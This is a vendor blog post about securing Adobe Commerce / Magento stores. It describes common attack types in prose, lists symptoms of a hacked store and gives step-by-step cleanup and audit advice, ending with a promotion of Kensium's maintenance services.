In today's digital age, ecommerce enterprises are thriving, offering convenience and worldwide accessibility to customers. However, as their growth persists, so does the increased susceptibility to cyber threats. Adobe Commerce and Magento Open Source / Community stand out as the foremost ecommerce platforms, and consequently, they face a substantial proportion of cyber-attacks. Any such attack results in substantial disruptions to regular operations, potentially leading to data breaches, damage to their reputation, and the possibility of legal consequences, greatly impacting the website owners.
In this blog post, we will focus on Adobe Commerce / Magento Community platforms.
Types of Attacks
There are many ways an ecommerce platform can be targeted for exploitation. Some of the most common are:
XSS Cyberattacks
Cross-Site Scripting (XSS) is a type of cyberattack that involves injecting malicious scripts (usually written in JavaScript) into web pages viewed by other users. It occurs when a web application allows untrusted data to be included in a web page that is then served to other users. XSS attacks can have serious consequences, including data theft, session hijacking, and the delivery of malware to users. Around 40% of the attacks are of this type.
Remote Code Execution Attacks
After XSS attacks, code executions are the next most common attacks on Magento store with a 24% share said CVE Details. Through this attack, anyone can execute malicious codes on a Magento server. In an RCE attack, the attacker typically exploits a vulnerability in the target software to gain unauthorized access and control over the system. This type of attack can have severe consequences and is considered one of the most critical and dangerous security threats.
CSRF Attacks
Cross-Site Request Forgery (CSRF) attacks are the next most common attacks on Magento stores. Here, what hackers do is trick a user into making an unwanted or malicious request to a web application on which the user has an active session. CSRF attacks take advantage of the trust that a web application has in an authenticated user's browser. Missing CSRF token on either of the POST and GET requests, makes it an easy task for hackers to bypass security protocols by sending requests and exploiting them.
CSRF attacks can result in a wide range of consequences, such as changing account settings, unauthorized financial transactions, data modification or deletion, and more.
SQL Injection
In a SQL Injection attack the attacker manipulates the application's input data to inject malicious SQL (Structured Query Language) code into the application's database. This code is then executed by the database, potentially giving the attacker unauthorized access to, or control over, the database and the data it contains. SQL Injection attacks are a common and serious security threat, particularly in web applications that don't properly validate or sanitize user inputs.
Brute Force Attacks
Brute Force Attacks are a type of cyberattack in which an attacker attempts to gain access to a system or an account by systematically trying all possible combinations of usernames and passwords until the correct one is discovered. To make it quick, those tools may use dictionaries of common passwords to get easy access to your website Brute force attacks are simple yet time-consuming methods of cracking passwords or gaining unauthorized access to secure systems, and they are often used when other, more sophisticated methods fail.
Silent Card Capture
As per the name, attackers here try to steal the information of payment cards being covertly used on your website. The attackers install malware so that payment details will be recorded on the attacker’s server or on the local server. If recorded on local server, this information is retrieved periodically. This kind of attack is hard to detect and can go undetected for a long time.
By the time it can be discovered, the attackers may have already caused considerable damage to your brand image and website.
Carding Attack
Carding attacks use stolen credit cards and personal information to place orders on websites to filter valid ones. Here the website is used as a tool to validate stolen credit cards (successful placement of order), which are used in other places. Our website becomes an un-willing participant in perpetration of the crime.
Malicious Redirects
Here hackers insert malicious code that redirects visitors to phishing or malware sites. They lure visitors to malicious redirects through spam emails. Redirecting a user to a page with the intention of displaying content other than that which the search engine crawler can access is against Google’s guidelines for webmasters. It is marked by dire consequences for ecommerce businesses such as loss of SEO ranking, loss of customer trust and damaged reputation.
XXE Attacks
An XML External Entity (XXE) attack (sometimes called an XXE injection attack) is a type of attack that abuses a widely available but rarely used feature of XML parsers. Using XXE, an attacker can cause Denial of Service (DoS) as well as access local and remote content and services. XXE can be used to perform Server Side Request Forgery (SSRF) inducing the web application to make requests to other applications. In some cases, XXE may even enable port scanning and lead to remote code execution.
Deserialization
Insecure deserialization is a security vulnerability that occurs in web applications and software when they improperly handle or trust data that is being deserialized from an untrusted source. Deserialization is the process of converting data, often in the form of serialized objects, back into its original form or data structure. This vulnerability can lead to various security issues, including remote code execution and unauthorized access to sensitive data. Insecure deserialization occurs when an application implicitly trusts the serialized data without proper validation. Attackers can manipulate the data being deserialized, introducing malicious code or data.
Insecure deserialization is a critical security issue that can have severe consequences, and it's important to implement security best practices to prevent and mitigate this vulnerability.
Symptoms of a Hacked Store
The following are some of the tell-tale signs that the site has been hacked.
Web store unavailability
- The Your website host suspends your website due to malicious activity.
- Top browsers blacklist/cut your site.
- The website experiences suspicious / malicious redirects / unwanted pop-up ads.
- The home page has been defaced or blacked out.
- We find unauthorized / unrecognized modifications to the site's content, such as added or altered pages, links, or text.
Administration panel and content issues
- Unauthorized Administrator Accounts.
- Not able to log in to the admin panel or access some of its functions.
- Unauthorized changes to website files, including the insertion of malicious scripts.
- Loss of email reputation and this may be indicative of a compromise.
Poor performance
- Slow Magento website speed and frequent bugs.
- Unknown or unrecognized are running in the background.
- Excessive traffic on the site.
- A sudden surge in traffic, which cannot be explained.
- An unusual server resource consumption could be a potential indicator of a hacked store as malicious scripts can consume more resources.
Reported data theft
- Customers Express Concern About Misuse of Credit Card Information.
- Complaints about stolen customer card details.
- Additional fields on the checkout form and lost money on checkout.
- Changes in Magento files and folders.
Increase the shopping cart abandonment or broken / altered checkout
- The checkout page has additional scripts which steal data / money.
- There is a noticeable increase in cart abandonment.
- The payment page shows suspicious behavior.
Search Engine Penalties
- Penalties from search engines, causing a drop in search rankings.
- Unauthorized SEO changes, including added links, keywords, or hidden text for black-hat SEO purposes.
- Magento store not being crawled.
Hacked, What’s Next?
Now that we are sure that the site has been hacked, what is the next action item. Since we do not know how the hack happened at the outset, the following is the list of things we need to perform. While there are many online tools that can help us, it is best to reach out for a Magento Expert. This need of the hour is to fix the hack and get back to normal business.
Step 1: Secure the site
We need to change credentials for all admin accounts and other accounts that are used to log into the site (not the customer accounts). These include Magento admin accounts, SFTP accounts, Linux user accounts, and MySQL credentials. This would be the first step to limit the damage.
Step 2: Backup and Investigate
Create a backup of the site in its current state so that we can do a deeper analysis of the issue later. If needed, we can run forensic scans on the image backup.
Step 3: Initiate Security Scans
Initiate a security scan so that we know what gaps exist as of now. Using a scanner provides a list of loopholes that need to be plugged. The following are some of the popular scanners in the market that can help you.
Adobe Scan
Adobe has a security scan tool, which can scan the site to determine any flaws and alerts you to the patches that are needed. Refer to https://experienceleague.adobe.com/docs/commerce-admin/systems/security/security-scan.html that can provide more information. Please note this is available only for Adobe Commerce and needs a Commerce account.
Magereport
We have another site Magereport that can scan a Magento site and let you know any potential known vulnerabilities and make recommendations. This is a FREE tool. It validates against core Magento and not against any custom code that has been written.
Sucuri
This is a generic tool (Sucuri) and is useful to test the website for various components. Useful for a quick analysis of the site against common online threats.
Foregenix
Scan by Foregenix test and provide a high-level report.
Security Patch Tester
Patch Tester is designed to check if the Magento store is vulnerable to any latest security risk.
Mage Scan
Mage Scan is not an online scanner; instead, you got to install it on your server. If you are looking to test the intranet Magento site, then Mage Scan would be a good choice.
Acunetix
An enterprise-ready web-based vulnerability scanner (Acunetix) that doesn’t slow down the site during a scan. It offers a comprehensive security scan covering not just Magento specific but overall, everything for the website. We can generate PCI, HIPAA, DSS, OWASP top 10 reports if needed.
Step 4: User logs
Next is checking the users on your website. Sometimes, hackers get unauthorized access to your website. And, they add themselves as a user. This is why it is necessary to audit your user accounts. Find and remove rogue users in the admin table.
Step 5: Check known attack vectors
There are many vectors for attacks. At the outset we should check the core files.
config.php and env.php
config.php and env.php are important files for Magento installation. It is part of the Magento 2 deployment configuration and consists of shared, system-specific configurations installed by Magento 2. These files facilitate the connection between the file system and the database. env.php contains database connection credentials. In addition to this, it can also be used for:
- Defining the security key.
- Specifying the database prefix.
- Set the default language for the admin panel.
The app/etc/config.php is an automatically generated file that stores a list of installed modules, themes, and language packs as well as shared configurations.
index.php
Make a backup of the file above as hackers can encrypt this file completely. Restoring it from backup can alleviate the issue at hand.
.htaccess
Configuration changes for Magento can be made using the .htaccess files. It allows users to modify the main settings defined in httpd.conf/apache.conf.
The instructions provided in the htaccess file apply to folders and directories. In addition, the .htaccess file helps you modify how the website is accessed. In addition, .htaccess is available for:
- Block access to certain folders stored by Magento.
- Create a redirection for the store.
- Force https.
- Facilitate some hyphen injection attacks in the store.
- Block usernames by enumerating bots.
- Lock image hotlink.
- Force automatic download of files from storage.
When this powerful file is broken, an attacker can use it to send spam. htaccess files can be injected with malicious code to redirect users
core_config_data table
In addition to the files above, Magento also stores configuration is the core_config_data table. Take a backup of the table and compare with the known entries. If there are any suspicious entries mark them for analysis and revert them to original entries. Example, see the image below. This entry in Magento would be either collapsed or text area is small. The white space would be visible, and it would appear as if nothing were there. Just expanding the text area reveals the offending code.
CMS tables
Check the database for any unknown / unrecognized changes in the static blocks, blog posts or pages on the site. Some of the tables are cms_block and cms_page.
New files
Typically, we often find new files which are not usually present. Check for the presence of new files and do not restrict the search only for file extensions. Some of the hacks are hidden in image files. Therefore, a seemingly harmless “png” or “webp” file can in fact contain malicious code that is executed.
Regenerate static folder
Run the deployment commands so that static files are regenerated. Better to delete the static folder before running the deployment commands.
Check on outbound requests
Based on the issue area, use the inspect tab to monitor all outbound requests being made. If we find any unknown or unrecognized domains, we need to block these by reaching out to the hosting provider. Also, we need to find the origin of the request in the code.
Obfuscated code
Check the code base to see if there are any obfuscated code and database entries. We can use phpMyAdmin tool to connect to the database and check for the same.
Client session reviews
If you are subscribed to services like Hotjar or Noibu, would recommend reviewing client sessions. We will be able to see the exact behavior, which is linked to corresponding js files.
Step 6: Compare Files
It is highly recommended that files that are present on the site are compared with a clean copy, that is usually present in git repository or previous backups (if infectious files are not backed up). If there are any variance in files, then they should be investigated, and a determination should be made. Ex theme files, vendor code.
Step 7: Release
Once the infection or malware is cleaned out, we need to smoke test just to make sure the critical path is working. This is to ensure that our cleaning efforts have not affected the site’s functionality.
Step 8: Audit
Now that the immediate threat has been resolved, we would suggest a complete security audit of the site be executed by Magento experts who have insight into the security aspect of Magento. The normal Magento developer is NOT tuned to the security aspects of a Magento site.
This audit would provide a list of gaps and rectification for the same. It is highly recommended that the system be updated by which all the gaps are patched out.
Build a Cyber-Resilient Future with Kensium
In the continuously evolving cyber threat landscape, organizations should prioritize cyber resilience to safeguard their operations. Protecting an ecommerce store from cyber threats requires a comprehensive approach to cybersecurity. Kensium helps you leverage Adobe Commerce, formerly known as Magento, to scale your business and maximize operational efficiency. Our expert Maintenance Support Services team performs monthly monitoring services, reporting, recommend best practices to protect your Magento store from cyber security. With training provided by Kensium experts you can improve your organization's bolster digital defenses, build a resilient future, and ensure a secure and thriving ecommerce store.
Take proactive steps towards safeguarding your ecommerce business’s cyber resilience by scheduling a call today.
.png)
